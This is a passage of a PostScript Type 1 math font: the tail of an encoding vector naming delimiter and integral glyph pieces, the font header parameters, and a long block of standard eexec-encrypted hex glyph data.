232/LParenBot put +dup 233/LBracketTop put +dup 234/LBracketEx put +dup 235/LBracketBot put +dup 236/LBraceTop put +dup 237/LBraceMid put +dup 238/LBraceBot put +dup 239/BraceEx put +dup 240/Slot put +dup 241/RAngle put +dup 242/Intergral put +dup 243/IntegralTop put +dup 244/IntegralEx put +dup 245/IntegralBot put +dup 246/RParenTop put +dup 247/RParenEx put +dup 248/RParenBot put +dup 249/RBracketTop put +dup 250/RBracketEx put +dup 251/RBracketBot put +dup 252/RBraceTop put +dup 253/RBraceMid put +dup 254/RBraceBot put +dup 255/Wolf put + readonly def +/PaintType 0 def +/FontType 1 def +/StrokeWidth 0 def +/FontMatrix[0.001 0 0 0.001 0 0]readonly def +/UniqueID 5095641 def +/FontBBox{-120 -220 1544 923}readonly def +currentdict end +currentfile eexec +D8061D93A8246509E76A3EC656E953B7C22E43117F5A3BC2421790057C314DAE3EFBFF49F45DA34B +424A961BE670A194E7E4BF0FF295DEE23134A14A7C08B6602621D885EE631B1D8D3003CF2093E039 +4D77FCEFCA8BA8965D1783DCAD9EFE6C7E420CF7B898933309A89F84721ADE7F3AE4443C5EAE8155 +759A9EB6F738F7BA81C192EE45DAD00F398FFD6904111BBD91BFEE328004F2A18BCCD98DCDB2CE23 +961B00F204E50EA022D00CE2B68E653626D4BB5AFA334A0D657307416FAF7AA8C43ED4DC541F1B7B +B7500B3F423D9D369F8192FD00A59FD5E6ABC70F788FB70976CC1907DDC309F4B690AA2D2BF12CAE +C493958CC0E76CE9EB5FF8BD1F1650F659E5C123EE455B7D77C39952C212AF319BF19A91E36DE52F 
+0EF84B602704BD6C7C94E1B0E067210DB919F6231755A2CC5D5FE129279B43A2E2CCD27F56F00B05 +C8AC10AB07FABBEFB3509088301FE78CAF8B440C5BA2FFE06BBFCD066046618F3B6AA2E4B17B296E +1F3F1560E19CBAD54E16E4B7A65622E468F6BDF97C50277E355D1DD8843D0A449A147FFBA071BA99 +CF70D7576DC18B96FEAF8070BF25F3A3141F873241EF4A07F332306B56F1D5909A4F233A9DB3A08E +E43DF38DD6DB2D6DAB908967A907303EE1FA04F048FA6EBC531738C170B8B0F095FF3B05D14C2BDC +272F7EDA8926A77D9CDA49A90AE1387A51A24ECDB2E4E287B0F95A83AD2EC0310F9B6F396AC10479 +835035FD5D4C84D91917FE8A8755C976504AB1A830ED516B5F325EA4ADFD115900D23039A2BC84EE +D21CC21E2BBE29A5E0CF28BE047CBD515DF7785F37DDD4474042B102A1F28193BB8567FF6FDEF811 +25CE9A504BE5011C0010DCEBCF321824C9DA249D8DB11F79298F7B674CEDB6F33C111F8B0115E407 +99E0FE1B6CE9F6B2A3EED1827A9CEB453D643FE5CE2540DCBCAF7B2EA2C8F0AE9434D4BAAEAB3488 +FEC7541D57179BDEAA0BB6145EA783E73E70E0AA71A4FA58E81EB510E9FD2CF4ACFBF28E48CA313C +CF5ED2BE032B7C9A07ABBEC9CCD8D5AC9F775D36BECC252B9FE01B6AA79A70E22478904DADDA08BB +7CA3B66F3A83AEEBA37406127353790348AE5FBD144ABD8E1B32D1BCC70E2BC22A63E854D38317E6 +BB97C52A6C9B0C6AB5C336CE2D417A714825DCD237F7486C33925A995CD8AD3B359176C4CA775FE2 +2C6F8A7C7343F31F39D1B9A5A744973BF65D655DDB59E3495B28DBE2A877EBB32A22A4AB8EB13C67 +02B239F6932E2DC8B4B88915923B1C2AFF2F876A31F765B91747D5A858BD632B0BE4F135AC484016 +AE1BC01E44B6653A58EE1380B6DF24AEB73220A36FA8FDE9A152C16E049D2F247A9AA71CD2DF3D9E +653054FAF518BBC1EEB43200DB0BACA93FEA9445FA5F32A99926C4F1F2370B2E3E03CEFBEECE5D5C +DE299FE1641A9CE0C90E42E7C465DF8C19C153EA76C11791F8E112853E708CD0F6EFC22E44808A44 +3686442645D643E7118D128BF34188FD313E53B8E951E605E96825738C4DC893D942C145C3E1153F +CDED16D1EE10374626F45781461FFC94C77D431BCF167FD29136A0B369631E139A59B06AC5281B3D +52470B38237B469C0E49CBE74C82A940F8AAD10E05C5DD2A8F3218C4BE40DCED0982770869190845 +D2E8BA2A1A2F9CF16DDDE418B6E2013C3258FBE9AFCDACCD57B01C4FEF3526C06FD5BAB6F195C557 +23A96FA3E5CDB2ADC9AA8989DF78F163F19E26F3B9EAF60D44B745FCA49B09D9CE5CC16D1E2C78C5 +A28F14D3374956E9721C0542A01A731A3D5A771C7B51FB72960BB22C99BC8F216530AA86C1A0346B +3D986EF1DF68BCC46EC4C809C6D54FB9C50F225ABA2C96965F4DE77E2C5D131318231C6773F0976C +DBD016B803C38B8923822BDF160FB87BBE744D0953EDEBDE87394282B9950C89F58824D731355E8F +A3CE364F742E3337A983BD1219CE8787CFA6925B560001F6F78343647821D408B60965966C16C454 +394D33268483F51984614FD9964CCE5F1AA4AB12144874A72D3FE97F4416ABE4213B4EDCA9ECF73A +937B562F978E059705E561A6D0C8B89B59B4CAB2248BFC4A6D3D98F89FF38A4D1C3E5A4570E2E2E8 +D328772E11DEA2116C260B13328045139A819F5489A2C302F311898230CD26DD03E6CE3BE75EDB86 +0D982FBC8E1E24D1F83E8CA64174495B2F32BDF0505FC96E9C65FDB0EB0C4ADA410F0A1C4BB4D551 +93B1AA5EA1F988882A56413F77CF24FF6516CD5095077BA566116797895FD7EA616D10510957025A +1DA05064FD9176303A248C94CE2A9875C03C7D8755A1A8010B712B64BAD73BEA4195D51A328F076D +12C0E52E87D98A5269D157D544CD7B4E1CAAEA6BDD59F08D0C5FBB84A6B099BECF8BEB721A874BAA +1BD1F8CDB5ED5CD3B49A763EAA36D33837667A6643B83537EF5515DBF7659E28692E0ACEB48FD051 +45534A443092E0A510B05B5B51B402CB3372A4E8BAF98A7FEB6D8BEF6B364A5EA0F3FDF301A44EE2 +3485D4493E7B4C33E0E352202931188D156983C40F7A4B615B6F5281B33FB32A2E6A0F7AE84BEA2C +5C3635D7DA17371D608847EB402270B83293EC09E4B1D85996C1CC81196BE590EC9EF0F258364746 +BC4763976FDDB3707D37AFCBDC0F4EB2B1502F137EBBB1541B992EAD43B5D64CCDF505FF2F127115 +4857C69B689A11760979F6D2BB032CF0DCCBB33D2B6F6D6BB29A1D0E371AA5869A408225C0AFF523 +CEFB08A7D3D17DF9064010363196CC569C436E720B1B4573CDAE1CD93A10FD2D4ACB14E47046B5B7 +66B75B40BA97027FEC4218980B002FAB60A9F1F5A37861B9A63F696732F8127B2C6F036BF32311B8 
+FF08A489E88218092D57A99C8981EF8CBBD09DF49CC836B9C1968692D1FB551F47619F020289F1A3 +D3898A96DC1C7D39A21B49C2D0DD9508CB8A8BD6A5EB40FF86F555FA32017B67AEC07BECD659E8C4 +8DD1D43E8D1EE08A117479015F78BF20D3318224572D9C90884856E4307A8AFFC83EDD317B008484 +3BBE8EB2A4E2D70077A639FE3637C3DCF87C67F1BE62E63CC67BCEF8EBD07E030524A53DD440F2A1 +3A019B7AA89E155AAD1497974258A01DA45DE1D94BB9F925290FE9BDDA29EA3F2BF1E64DF7EBCFC4 +23AB2C7310D9D87A5CA673EE95189135E1B134B431B231428FF2BF64C8F155CBDDAD17BCB524CF7E +ABD66B75705BFFB1DDB27B72D681D7AA19FAD0FF23EEF028B606DD20D58588AACB299A3CF38372A8 +E7494A65227C1E4A231AC7843962B8A4A7BDD90F3F8B83277E696F3514139BB8DD207641B62286F0 +0E32C7FAD7029DC0E092564C7CE1BC5240FCBFB00A06F075D9536F0326CFFBA958BA7A1A11AA047B +B14E7DE16761BB0FEF19ABE85154359807C339961B9695CDED59E489CA4D9BB75D86D9EDDF0502BC +0B4EC36B1D71FCD4E03881ECEC703E5DA23B3F5DB98CB8DAED81D5BA20B844A92A4B92FE5B082952 +6837237C7F994786878404BE744D0953C676E52CB05FCE193E8827F977B31929E36E320E770A6F1E +972B84AFA21E01719759DF0132C5CF9692BAA487E86E8453C09FF97642600D1024ED5D6C7D5B387D +CB5E6147D20B4A14D7D485B5747D765C5A1CA40B9416DC4EF5DC08F43F0706B27B1C90E901556E1C +EFF304EA8DF8D727E4B7E7CEAD14E4FC7E76002DBC37B92BD0E58AF29DA7DA91E6F99DADF1A9CBDD +04648E2F5B811F2AF0729646B17D32D7EF25AD47E267EE53A61A7CD744C9ABFDB1EDB71C0705412B +15769188CA1601AF0395796FAC0E2139EF90FAA65D27AAEEEE319D2831A56CE82203523097D0574D +22742D17E519D95560B8445B5B29033BF3454B94F20C23EBE8B90DDF26D903F1D66CB39D3A64579D +39D136C537CCD9FF2D6ACE5F79DE696C7330C0C4EA179D7911B7B67858D86CEE0833AB1E105B1993 +2A9BD572C41E78FB4A2A2421514DC2066E2F56101A9027F4BBA5D48E5DA9218E81CE46B95B50380F +560C67A5D547A8D32610AECECBB6F5A09DF44994F6DAC64F7399C07E182033BC1B9A32B69C41FDFC +7E1DCDDF273F045F154D727AFEE3CDB816CF2ECDB6733C579276353DD59C9D2AFA455935C1FCD0AB +7D57F9DD79FBCC7A45E5E5A501FF17EE1C5FF0823C6FDE29C60F85F6786940D8E3540E891B5BF7F5 +D36C57AC3AD359BFAB12B215E7FC94B933386C250E6B236506FA3D151ABAD893A817772071C09144 +6E5FB23A17591A4CECAA46DD46E3C41B4578F21D8894A59B72FAF6F88EE6E514FBD2FE69447D2B59 +9A6AA8BC5C1FD5C25E50BFB5CE5DBF5AD5771BC42FCC3706B6E9F7E4FAAFF2E63ED1684C5A4C136D +609D03E31EBCF31E864AAA74D8DDBCA52F85CCF14AB739CC55617EFC964D6CC6988AA45245B19CE2 +B63CB865DF1F1DA4A200A4A043C5CB706CD303EB31C32866ED92077AB11BF136D158840EAC67E7A1 +1BC2BFDCD5894AF735D677E1AC98BF3F19F69AF75355F168632037F6EDEBF61BE5854057AD05972C +7DA8D37AE65D35738547A9D835C6351D8D732F8C0DC49D7605F00A6A6045559D3A0B0CC21DFDD75E +2FCF25522001741EBBEB5CC97DDBD9DDCE490FE3CB186C101940DD02CACB685ECCB8C1DEDCDD4156 +F5F9F6B3CA53EC6E7E8A2F8159451CD5479D91BFBF91C6B32A1E0053017369330EAD2DDE323BCAC5 +EEC91A595473F447355B1BDFB873D0B538BF54AFB8EAADE5309E1B74283218F59272E59619D66405 +E74B5A9D6323CB76AF00FB27FD984F740601248C7206F59EF7FF4E95AF95327D12C47D2D34CBFF33 +29F28236831D7F0FD9D633B940D8282E1F1D5D95616CD839C6B41A7195A22B7A320864E48943CE99 +C68E3591A97689986A6536C3A1C37DA9838FF71A8C1A03094537C95D3585DF5AD9292874D8D05720 +030133B02E2754DA24712B52D6D8871422C709532B09D147EC8ACD861FA5392A82A6C2981347E327 +1986017B8315822B5FCB19A1B31BF6909E0D6490EC823434BFCE031045D20FFC675A73EBD7A39A50 +44C3B40906186CCF6E8502CD7915F053BC8CF6BE9FDD9A0330AE943D5C9A11D60D43F5BBE8A045EF +CDB7D19C0053F4F082303442C35C432E0DA4408C5917D24A6658DB807BD754AF140CE84A34F79851 +9323060D60F4EAC0E82D3E17042BB6729C69A8B8774904C6214C2EB016C528DC1428DB41075AA6C5 +4E4D849901838C6B6DADF7B67CD0CBC6EE1B415B44654D89397274D4A6AD2BA69DD81567F5B802F2 +684DD3516ECA0F6D66046EDA0B2B38F420A238D67D98676925ECBE6711D64DAE5DBE8AC5473A2EE9 
+97AE65F0715A2E5DB2C75F20D9939EF58692EDA3AEA81F25AEC888327CFA6CC13D496714E63A1A87 +11FC50250D6D23FC7A8017038281F659A685ED7F1BB1ADBF8833ABC6DBEC0D96D08334E58C67E0F9 +0046132F0D4FBCB9CDF52EE74561498B42701AB826A6DD77F46C14753748E1EC66F4BD3583FCB4F1 +DC91050CF18B0D51BC366549261282779FC9694A7B987973C0D59F65CFF3CDB88D23952E46F5EEC1 +BDA0DC354188C11B0FA191F5C11A45BB9093701B33B8E7AC1A8621793D5326E92CDD3A76FB9B67D6 +860567B9CEE7B9F9056C6E9971F642DC0BCC1D2882B5BDF1B1CDCAA3FC61775A74E70CDFC128DE0F +9606091BB8E53905108EE77A1D3C506550FCFCAE454B020379BE3A7D6C62D162697AF1383F7BC8F2 +34FD616324C1E56E3E440277862CAB2C02395D9937816117F71A6828344182E6B5AF2799E29A6611 +9C0543E135300E44746EF2EBA57C4EABB1A15D8AC6D037F4BA2BE1EB4D1A7496F9711FC67E56D4D0 +FDA4D810B5383A72ACA15872DE9F3A9890E33759CE4DA493691BCA47A92E42D950DF588C3574D6FC +72B5AF7DDE915E3F5925B3E97DEBE6A4208CE7337754045607679296C4EEEA3A3EF1915E85EB1A32 +F1BBADB2904B09806631E20BBF5E57AF11BC784C75BF049B4BC7E479F1D4AE7754CBED7B11ED80A5 +2DD0006FAE5CC23A7C234CF628B42F4104A490E7D59E8B1F2A1395D37641C478FF8CB9FB602B29FD +3E48D6087CAEE48B523887F27F69DB32BF80B760B030A6766F8F9B19DE70704DAF81D3DED2BF663D +89B5BD8AF253BB8FA59DF84A52FDED83D2737532B6D66AFB9EF0446ACD44BFAB797AB9FDB47F2E18 +8F0A55887853772EBFD029B5FA0AFBAF10A88D464BD6F634C5839B230D583E36671A51DDB1EBF471 +8ABB84D057729D514751B0EEF4F756B91DEDAD7D9AD529B3886008F1F32645F3A205F304B2A8D808 +D37A38E389B8587E8D3654DC374568FCEBBA160395BE1D132B1ACB434164525FBF250A5AA30F3520 +F0F2A75F9D1B7C6EAB0223C209A120D894D6ECA336B57B7F2AB0E2A94E6616D7539010C700311966 +7B4A9EB3A812FEF4D100AB4C036401D21DDF8AEB393074638D154418D3A7AE51CD1F0C2D5CF4B475 +3B582D5071F91E6D3AFBFB09EAABBEAB2A60A5D388D16232939B5483CF7D5C1C9D05DDC85B266F39 +6F61E179AB9FAB644040014293EB53F2B50E8751F9D92D1DAE8DC89594905A39357C0098265FBD24 +E407F9A22027E36D5608FAF15BD9E354228E3BA943EC30301ABB2CB105F3B6D57C001EBF8328A8CA +318A7B1B999AE8BF9E2FD530B669640116149B622EB3C0A8CCDE62449DE9D39E0F5E5E01CBBF4F5E +52B33A2BD60B52FA4A5CE98B7313FE4C3FA30FA07DE4516109C3EAEE97ABE430C505647DD8B3DBF2 +BB4B3A806B14A9E0F629863F15D12A1CA62E8E055FA6ACABDE1926D3231CAC271C30A3F7AAC6084D +D88628B943052B618E4E39148600AC1EDB57B0835C291F73D29C51FCA3C5EFB1DB18A5CA47433B45 +C57EB3CB28AEBC68E4171E6DE357793B0FD2A1F4E76180248017112674DAD7ACA6ECAAF209CA174A +5603CEA5CE528F20919443900636E2FC79C303EA7B467A3F001EA8CB849BCF28BF40A3364C08ABC9 +B5D935CFEDA827A8C3FE2F6ABA54017D2AD0393A05AE21F7AE1F58AE1E992B5C889219DA157FA7EE +92E291DE2F9DFC244F2CF0FDCEFCACC487F0EA830985B687556D5AF53B81814DE9CE0C6C430DCBCE +51EBC6091B4E0227732E07DF20D59E9EED4D8A83761CED84CCE244BFD6A39103A2B48A684AEC9210 +5C94495D54FD6690AF857E5A3915E6A15689F1816F75F1FC8D5769B240639B339EBE54BC6D84794D +50F4EBE892530351984C6F8BEBE097CD46F4FED7D46E32830A16F77C13F13D17003737482F02D1B6 +F04C57B4C2B1929AA315B4BE1C7C9CB55F8981508546B67E4EBF84B6026C355C5E4E07CD98C95F07 +56F6643FB1DD7D8C77C4AF4C4F23602DD3F61D1C46583071AC460E74084F7F7CF812BC53975CAAF8 +B3C1160B5D6864AF08A1733FA893CE4248C8F8B46AEFCCF317DC726BC1E5F2445E462E0591BEAAEA +49AD8E4E2D3CF07F900EC46D596E9CDB3A8710A0B93CE5DA9D35E612596A6374F35AED0EF55DC46A +8E14A91163B87417259DE926BBC3FC5423FF0AE2AA6D740BFFD26981A57C8C1D97FB04A90A567296 +B07437F94C8FFF4709213DD5D8862A777CF3F97723F43A4F913F4A30F7554ACDAE34713654E21731 +C594C3718C0547FCDAF7BB1620B2D6BB19E65596A585290CC43F50B34A2FE6EB1E495ACFFB16DFEE +8784B66FCB9359600412969E2BDA330C421C68345A797C49728450A6CF41C926AE8EBBE80BD97863 +593C3E8AB5415A8BA625957F242378948F5C7EA9C2641312E8E46955FE5C1A1824C71D3B0C9FD211 
+7CC965DA7C21D257587F291AB7C594459A11B977A278C74CF5E6598B0C75ABBB2FC1B3D167D7E31D +B519F4A0BDA650A3FE7F1A281DB9B69B57A23656BD820B22D0E30B07361FE7C90933E24A32B6DE2D +F240635D543315226E32487F264AFE83EFEAC74117321A82A92F4FC7B259F26DBE74C966B4CB3F4E +3499E30B9B326F72D73919D9FA9024AAC0B95B6751AD4CE569CC3DDFC399428DF1298FB1733FFCE6 +240FB3BE3A2837E1A66E08B784CDD131B5A61423508000785CDC5610CE4DA1DD314131767C8857E3 +3D9741EF3FD7B8D0AF0371CFFA3DCF74FF2D3B421AC0339EBC05FB4B61A2F46D6BD1144747AD148B +7968D7DF4D0F742AB39B0A04A88D66F5CF9876970879879872BFDA0C56C253DE5C72016B4990CEBB +2455DCDEC7465EE7C7E1C557B570E9F3EF3E31A22DC8AB9B17F34F48E135BE7820ACE383DB7C5B05 +8A9DC855C6850E49AB7D7D00ED2D23C50AEE671B11752F0A682EFE179CECBFAB47B76676AC0E8FD1 +0A47353D3AC3477A59B0F3CAF22849DE97AAC8B79935F7C57F3052DE7E13BA0FE7CEC4685C86E841 +EA8C7D6734D0FEEFF538CC2AA1414EC9126637E169FBE4ECAFDFA29A08451B25954F0094710195E1 +69E0A6004419E432E9319BE2AEC8D93407B25B758336946C6E30032657DD857BE9C0A05F487423D2 +0C2772D4416D27FEB5CCC971DDEDFE9B8C2D7DF9DEC90D0868D5DD18850BE567A04D08310883D9B2 +D50B817D0690F8550E238C1139C0A117B48199B1B4D489C9E52C58E0CA75E6C386ADD447D8AE52D1 +D979FD52A50D82BBCB8867B5D49C19BDEC414929DB67A00AF7C6482A87E46BD11D8E4E52783E5845 +FB2CC7439F99FF6552C7288354B436B1C361AB8C2932F77B14A50A7407FC0BCC29662D710248CA46 +AC42A03FBBEF9C972783942F3721BD32BDA3273D1E353D9E013D4CFF630BFE4E7C2963FECFE350A2 +860421D17D6ACA888FA26403726A0E16BD10638D8511A2C8A36C99E9B72A422038E1149BF88A7CA1 +B2DB196333F3AD32D6FE28F18FE1ADA06FD25E4597936A924E71C188B9E8779BDBA928A182042C96 +F6A14A6FAB5C1A819DB8E9374E32F77393734A65606809E90D188F749180A3E6CA7AD8044E168677 +15FDFF350D70B14454B692715DC3AE2CAA561FB953B478E873EB19C41A8D83288451E4E910D5988F +33D83C5974DD0EE4DF2E6C849C500D0714038ECB1E9336D71D852889F2FBCA6769949699BE6BBF19 +A9318CCD7C845D0EC7FF3CFD871328CF7B45E6BBBBD16094E8ABE4D3789DEAD2C930AC8D810C911C +03AF2BDA4EBA62810F19B4506592005ACFF16EB58E33D6A71EA4DAD28A2D7B10FF89ACAB4BCC0F96 +E622EBA20347AE04C62A298257D1623977D185BB46B42CCDD733F72B37072B8DFAA5D7FF77E35618 +3F6D25EE1D951F7EBFBEA8FA17A859B8545BDB212A6BFE9C3078C32124C4E5D4DA09404E40498F76 +7B7164C13E12BF006EE8DE408070296EF0A08AF759206DB3C445BF49EAB18ECDE1FEDEFFAB653FDC +B13FA4649B35D12266FD42D0498331560E96F54D4238678F70233F56097E1944FC671D6BB1AB66CD +E0E9DC24349E44D67C36B3E3A00B07755749A597DF31C25F28D55779841BD3F6221BCDE389852DD4 +590E075C1298B36181D9F64BDCB54A556C05A9EF661EA1CC7C7549A3E1CCF79B87A6E71C3ACDECC9 +C4EFB05B643744407029258B8225DBF960DE529EEC262D1D3113F6CDDBCF4BDAB706BF085C0FF2EE +E8420CF755E46B053B774DF37C5683F8432EEC183C96176BFB24B3F478FACACBF1FCB73D83D4D857 +2D0F15783C8AE95D7CE959D794FDE1D973867D8F30A301598BDB7F2824B2629D64B88F0FF4498B6F +3728CF8916EA884C5930677E7481F90C85ED41DD28AA00E714D3A4F2CC136E417A4C591C7944C409 +70D2BCBE410A940937C3CAA118FA32317444B401968B8ECB2F0B3C8DAF6D4886C2015000A71FDAD4 +066B82312A4CD1E49A9ACFA05C3E7CA5A5CB3FA713CA0AD9E66A34730A36612C72D1F803D4CB1501 +9184FA2FDB3E5D067BC64B29299D5531565264B70FFFF86F5A5B03848E55D73337650208D21F35BB +D5C14748CBE17EB3A7E02BE53136DC69E8740C597CE28472CAEEB96EF2A5752CF17CFBB82F6C104F +2BBB50C216C49E8AB7E661207E1742B35392752051A1E409BEDCDA2654CB5155B770C8C5E4A2968A +A35CF1924D0C74A8D23AB811B7DCE60F1EBC1494A295C8D670E84B7B886A6064151065BD96F2D364 +7BA049A444CF16EB6432CAFCC70FF2E8B354F55A192C94BF08D156856A6512403F5140DF4C8D254E +DA59B2B3ADEE19A35E9A61202B711193A7E7BA8EF427152157DA5A51084EA46510864E1CD7B4FD11 +16E74D7BA769ABCFAC556BBA7CC528C18003A2AE059CC97C18263500667F6A9A8C421F2ABDD73EAD 
+82D9D08940DEE1688D4AA200ED80C3AFEF6A4979154D99478D4F4EB3738333E8581A755190D87BE3 +09A319ED170A107512F056E4C619D4BB1615BA6C0680117610A26462F267B76F9DBC9A7A3AC08C9A +512A44697082A2718B62FD1D565010AC96E1006F958070AB7567A33E1FF7BD450681DF6BD4EBD265 +CF12726A7EFDEFBB9BA1E596BC5C2940A4FC9DE60116C9082138F1C672977F4AA6B7986ADABBB2B0 +651A7B0C06C4BD405C58B8C81BE075997E118E10FC008AD1F9ACF9F6AAC6C9E3F6DC7FCB838720E8 +D0D9BB99F203EEA2566F18232711E832810F10DD4E2DE44A0A81603EB1162E1BDB60AA1E2D771EC2 +E6E2C3B39508E5CA03A1E2A7F2860BC6F0B57240880DF54C325F4729EEFA1D2753D57F055CDFCA5C +E9C6630980C7121FC21E2F7223E6111C18FFDA0A0A7643A213DE9525AE138814C4183BF03A26A36F +EE9199821464C845A746945413629DC53F5A2B0D8CE9282B580ED662F2F07398D6A8B7093CFCC6F5 +E0F5A7926D2862AD1CCACB84D85902038551EE3EAED02AC7754E3B65818C530A0252C049A68862DC +A459DDD937F7BA64DB16AC86885B68AF46422D7C4923070E20CBAAC9F14E43979C5D5AC4C9321016 +7CCC52E7DA272146D68D8F61DB4D60063E74F6673B41ACB601DEEB1DF73517A8C5388F00E8A9D236 +9C85DBFE4C1E9864AB52E09F465EE98C194151E66CB98E6981EFFCADBC48532E9795290CF745FDA9 +CB7FD40BB77C148A8B90C0CA50176103E2ECCAA57030F7C0882F1E891F9EEBA077AA4992FAE38C75 +5470A4C35454EBAB45271DD76E4DBB2D9147817F7D3FB800EA136D3F27C84B4D45ACEAD13D3C91EE +BD6836AC04F95E578D1B7B8CE5B718E42FD1BBE91EF9A7873F0C6DC59AD231D08CEB4AE312F83F1A +9310155D2C4F216A6FC72385C899B5390EBADE7CF7BEB028F73DD76EDEEF639E9EDE034ACB25BA57 +8C7BEC3581FEE0B221F7340570489596FC60EC805405E0D2ACF0687A62A75358B3878972D4C039D9 +07D868DD00C5F7F3342384C09B01F1926F7D37C2B862FC516361253CBBDAB354898B31B1FE58F773 +61517F2C2E106708AB659D95CE3E9E7777B7327DE01AE2D1E0C84B9EE3887C094C149700CB095D5D +A5FEAF1AA9027AF257576A7370D79FF4DB98511AA27C5C083FA0CA60A3A5E66B8DA9A22FE5DD3DDF +C529BEA71E83881D8B010D140AD686DBEC9AF4B331086F6556B695CAB14BF24B5FE64382E6F9BC21 +5E9EC40C0914B1E27BC25F43E6F555B551726A8D9CD590D5AD3732777EF3B00CBAA89F8E8E0E0347 +7D45B00181A7B196FD4919F110C0F2C0F1B41231051AB5BC8F8025ED00C10F2C2F51E97B622A4E84 +E6AADA59F896F83EFADE779B37FACC56BDCA1892A3BD965B65D51B55AC1D73ABCD16D0EADE55C0BD +3C1BE9FDB323E9FBC9835C63F757051E29E773D3491706DEEBAA0F1182F0E02D0CB701661B30770D +94E240E1358195781006E18CBFC2D83F229A89C3066E35CAE1384A0266D5A37824A089E855F11209 +9F723AF03BC1C8B1C0BCFFDEBE3EF73A40BF83F5E038B63267DE5413B88D30155E62EDCFA35C0047 +0178E5558CDA2B30C4EE2A9854C93E0E484D4363E3614E5BE829FAEAE51935386D20DBFC00B42952 +7F56FB045EC4D97B3D649415045337AF44BCF4AD9B9F9BF3EA72151DB616FF8F6B13EF66516D9640 +67460FF123C7EA525A97F1D04BDE9D3D495602620659F6E5DCF1AFC5360D1C371BDF9984C4A7B462 +180A3CAA7098E0FB0BDCE694806BA466883BD28D77DB4CFB6635BB7DB45B4D83AAD4260A4CA0D411 +0E251AE7476A95327BD6AC1AC88F85CCB705FBD09993B9E2990D51C37F1110F78B887C54E4EFDA80 +4ADAE5D81477913B6938FE1B39913C6582021A1ACA834500D9D75C9942CE2375D0A2A73805751EC0 +970D6FA62D4354337A43D85DEA6C6F3334F40221FC473DD79344D028FAC689645963B371A55CDA92 +F6BC989F4F1880AC11D8A056DF7A0EE60471800126526488B95B785698D2AC488CC027D31190ECE2 +54F80757DC9B4FF18171409C457F5FC58DD1D43E8D1EE08A6AA2F374B7C245B7A21287DC333BCB1E +EB498A2BD723EE6BB30B76E574773F70A61F1E163A25941531C049ADEDDB59AE75B7A6725D997752 +10ED356DD93D0F0AD7EE6495F07869C570125125BC84946F6AA1152CA18FCAD3B68004A7F7AFC6E0 +9EE6E1B365A4DA15DA95AB980A566DEC7394F385FE041B3B7F46D62424F4726B55DCB4BD3625CA68 +1221CE01DAE78E24F8045EF21F85C13D27D1F0F1B589F936F62F699B93EF05930C6F5730B0AFDB7A +7A829F2ECBF0DD196ED66C7E4E4E7E05B565BB98385F017D01B1305856DB747C3634BF05DAB08836 +029674ED3A4053CC3DC696F758F86970F94034B4F0DFEAA4DBDE449800DB040B55E7FC83E6B5584F 
+A00F7C70ED18524037CCB48A22A5A69506A825DED81D98FE93177DEEFD42B485013D4C4184CD690D +714530B56E355FB01BC92DD90A7AE8095748A872F79121A28E965E6149F37C9D5F4DF64574F605E1 +B929174AE0CF533F77EBA0E10862BBAC46BEBF583B951BD0BFC5128B08CD998DE897033E7CA8B198 +625D865701394543845CDB7A45BF82DD8B6319658E28B34FD319E38E650869742BD2672623ED9810 +8DF14CE5C911AE0AF2035B4F9CC0D1D84176CF3AEBC4834E8BBF07B7720521C4E6C081A962FE29E0 +700C4F4ECFE92C39BEDD64C3DDF52959A4102CC242C35F56139643F22613D675F970CFDF8C6A57BE +9D168C9CDF93915F66A5CB37DDB9B8B729F8131391F9D6EADC8BDD5C13D22A0EF967622F3F7C08DC +C422E3D41B3BDA6B4520C98FD08262303E042DF37B9911C1447F3DC8A854973323E1C380A02DACDF +8A53A0D1EDE9BF34A50E8B76C5AD5B15F8E25B2783BCF4B1247309E9B70CC951CF3D98C1A25E9CB7 +11235352F3BA91FABA828F2D7D91F0FFC50852860C531C20A5FAAFBCE1197CA367F0F84DEB86A8FF +A9FF4C252EB2633AA2BDAB30F2094721F482CF926DA3299452177B79251B311AA60D4CC82F5A9F50 +E942703877AF1C10CD92DCFD16CF19BC7314FDA5A85284BDE964DE2BEE782F4D52D17FD2084E0A95 +59EBD5AADCC74A6DE64C1F799385F5EC2E2F5F869F78F7289A26B03A9FD906934C3A6BA4A7B36E7C +3B77A7581BE9CD62B49C34572A870053CBA85DCDB9FDDE407B29CB3D02AD1C752B54DBB995DF0F8F +CB117CF8500B97849275A4625EF9937AFD7C8751B9B021E778F7DE9A9B191BFC470823FB8EA919BA +DB8B68755DD83C6905B118FA18FAAE216E2494FDEE9C1125C3941092C592DEC7A5B0C763E7E0D3CF +DA02AF9FFCD234A01D75C661603820C37E9A681356A6DB424F5F991FACCFF78EAE3518C0747C35E0 +8EDEA2E108CBBFFA0B2D3BFD612B5743AC95CC4A0580A6739BE4EDE6CB1E8B2F4CB5C6FA4572329A +06080E0085748067462F3EAEBCAD734DDA18BF206EAEFE9F882807694B80A63AF2F40625E98DF55F +BE08AEEEC2C1BFBC16F1BB4D391B17122EFB5FB539005A613EF5C9F154BD50F05862F813F2083CEA +149FEDC651191259BA4FAA658A42AF151B03A7B553AA79726A44AF9175A724E0D65CE84F41F3B7B0 +E0B684656EA56B4E7E654946AEFABDABCC4F3876B3C3A67373F4133FA8498DCFEBDC27476FBB28C4 +003FBFB063267FEAB2B2BB8DC647345803B2723DBA8905AB0741137C43768B434CE118954AE55DD6 +61AAA1BB60B87ADE97D4197211A0C70CDD7855783B7C570FD742AE5A5940A3D90F9EFF687C4F1E4A +D3C4F5C3B9FF20B61C0076B9FF060EB99860F31C41B5AEC0D2C4DE626C6059678DFA35BAC5F2F171 +A3BD00065AB2007EABA499E4E7F30EB994F8BA757FF9BB0C9A2E3E384BC1DD4B62036E2D70819AD0 +A535816761800CFEA50681AFBF0057E69A0CDBB4BAAFB8B15F7727BE1169BDD4FAF692F9CEC12893 +E4E4425DE4CB20F330951EB5A7FBB0FC10DE78A7F9B0EF6FA629CA13E8C2F616A1BD42B1E26E2A0B +533DEA701AB7BA93526E2439755FB9BD5CB076C3309E73807A5935AF6CDBBDABD5DD7B036324130B +8BC40163FA0999364553CFBE351509F8A5167F205E228ECD66EC9375D0E0713563AE75B6C23423AE +63EB67167F2F4512BEFFE96B90913E6920F1F8B7139F1CAC9E38482B6CD26576776A01103FDEB164 +A176023370D08906E2EF27E1E8B6F6C27EC67A86EA36A6C82B681385F3A60AD53A8512E0880D7ACB +5567F2654731CCC1796C47E18DD6CCE30F65E27DDC5A3E56BFA0460DFC3F9FF1E98B7BDA9DDCC615 +718D7C6CD8DC1270E70FDD4973B287396E2B85ADFCC83C71DBEBB97346E858CFDA78713C0EDEFEF6 